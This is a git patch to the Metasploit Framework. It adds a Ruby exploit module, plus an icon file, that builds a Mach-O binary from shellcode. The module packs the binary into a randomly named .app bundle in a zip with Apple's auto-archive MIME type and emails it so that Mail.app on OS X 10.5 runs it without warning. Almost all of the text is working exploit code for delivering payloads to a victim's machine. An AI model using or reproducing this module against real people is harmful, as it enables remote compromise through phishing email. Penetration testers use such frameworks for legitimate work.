From 9b343c7149f56455f97a75358c91b001190fa697 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 28 Nov 2007 22:23:31 +0000 Subject: [PATCH] New mail.app exploit for leopard git-svn-id: file:///home/svn/framework3/trunk@5209 4d416f70-5f16-0410-b530-b9f4589650da --- data/exploits/iceweasel_macosx.icns | Bin 0 -> 39250 bytes .../exploits/osx/email/mailapp_attachment.rb | 231 ++++++++++++++++++ 2 files changed, 231 insertions(+) create mode 100644 data/exploits/iceweasel_macosx.icns create mode 100644 modules/exploits/osx/email/mailapp_attachment.rb diff --git a/data/exploits/iceweasel_macosx.icns b/data/exploits/iceweasel_macosx.icns new file mode 100644 index 0000000000000000000000000000000000000000..e97e490585226e69da9cfff20b3b4db2384d963e GIT binary patch literal 39250 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 literal 0 HcmV?d00001 diff --git a/modules/exploits/osx/email/mailapp_attachment.rb b/modules/exploits/osx/email/mailapp_attachment.rb new file mode 100644 index 0000000000..44bcfd5429 --- /dev/null +++ b/modules/exploits/osx/email/mailapp_attachment.rb @@ -0,0 +1,231 @@ +## +# $Id: mailapp_image_exec.rb 5206 2007-11-26 22:29:07Z hdm $ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + + +require 'rex' +require 'msf/core' +require 'zip/zipfilesystem' +require 'ftools' + +module Msf + +class Exploits::Osx::Email::MailAppAttachment < Msf::Exploit::Remote + + # + # This module sends email messages via smtp + # + include Exploit::Remote::SMTPDeliver + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Mail.app Application Attachment Execution', + 'Description' => %q{ + This module exploits sends an email message to a user containing + shellcode encoded into an executable attachment. The user does not receive + any warning dialog when opening this attachment with Mail.app. Tested on 10.5. + }, + 'License' => MSF_LICENSE, + 'Author' => ['hdm', 'Kevin Finisterre '], + 'Version' => '$Revision: 5206 $', + 'References' => + [ + # ? + ], + 'Stance' => Msf::Exploit::Stance::Passive, + 'Payload' => + { + 'Space' => 8192, + 'DisableNops' => true, + 'BadChars' => "", + 'Compat' => + { + 'ConnectionType' => '-bind -find', + }, + }, + + 'Targets' => + [ + [ 'Mail.app - Binary Payloads (x86)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_X86, + } + ], + [ 'Mail.app - Binary Payloads (ppc)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_PPC, + } + ], + ], + 'DisclosureDate' => 'Nov 28 2007' + )) + + register_options( + [ + OptString.new('MAILSUBJECT', [false, "The subject of the sent email"]), + OptString.new('MAILMESSAGE', [false, "This text contents of the email message"]) + ], self.class) + end + + def autofilter + false + end + + def exploit + + data = rand_text_alpha(rand(32)+1) + + msg = Rex::MIME::Message.new + msg.mime_defaults + msg.subject = datastore['MAILSUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1) + msg.to = datastore['MAILTO'] + msg.from = datastore['MAILFROM'] + + txt = datastore['MAILMESSAGE'] || Rex::Text.rand_text_alpha(rand(32)+1) + + bin = '' + + if(target.arch.index(ARCH_PPC)) + bin = Rex::Text.to_osx_ppc_macho(payload.encoded, '') + end + + if(target.arch.index(ARCH_X86)) + bin = Rex::Text.to_osx_x86_macho(payload.encoded, '') + end + + + zfd = Tempfile.new('mailappzip') + + # XXX: Race condition, fix the Zip API + File.unlink(zfd.path) + + name = rand_text_alpha(rand(4)+4).downcase.capitalize + + Zip::ZipFile.open(zfd.path, Zip::ZipFile::CREATE) do |zf| + + zf.dir.mkdir("#{name}.app") + zf.dir.chdir("#{name}.app") + + zf.dir.mkdir("Contents") + zf.dir.chdir("Contents") + + zf.file.open("Info.plist", "w") do |fd| + fd.write(get_info_plist(name)) + end + + zf.file.open("PkgInfo", "w") do |fd| + fd.write("APPL????") + end + + zf.dir.mkdir("MacOS") + zf.dir.chdir("MacOS") + zf.file.open(name, "w") do |fd| + fd.write(bin) + end + zf.dir.chdir("..") + + zf.dir.mkdir("Resources") + zf.dir.chdir("Resources") + zf.file.open("#{name}.icns", "w") do |fd| + fd.write(get_app_icns()) + end + end + + cmd = Rex::Text.encode_base64(File.read(zfd.path), "\r\n") + zfd.close + + msg.add_part(Rex::Text.encode_base64(txt, "\r\n"), "text/plain", "base64", "inline") + msg.add_part(cmd , "application/zip; x-mac-auto-archive=yes; name=\"#{name}.app.zip\"", "base64", "attachment; filename=#{name}.app.zip" ) + + send_message(msg.to_s) + + print_status("Waiting for a payload session (backgrounding)...") + end + + + def get_info_plist(name) + +%Q| + + + + + + + + + CFBundleDevelopmentRegion + + English + + CFBundleExecutable + + #{name} + + CFBundleGetInfoString + + 2.1.1 + + CFBundleIconFile + + #{name}.icns + + CFBundleIdentifier + + com.#{name.downcase} + + CFBundleInfoDictionaryVersion + + 6.0 + + CFBundleName + + Busted + + CFBundlePackageType + + APPL + + CFBundleShortVersionString + + 2.1.1 + + CFBundleSignature + + ???? + + CFBundleVersion + + 2.1.1 + + LSHasLocalizedDisplayName + + + + NSHumanReadableCopyright + + #{name} + + + + +| + end + + def get_app_icns + File.read(File.join(Msf::Config.install_root, "data", "exploits", "iceweasel_macosx.icns")) + end + + +end +end +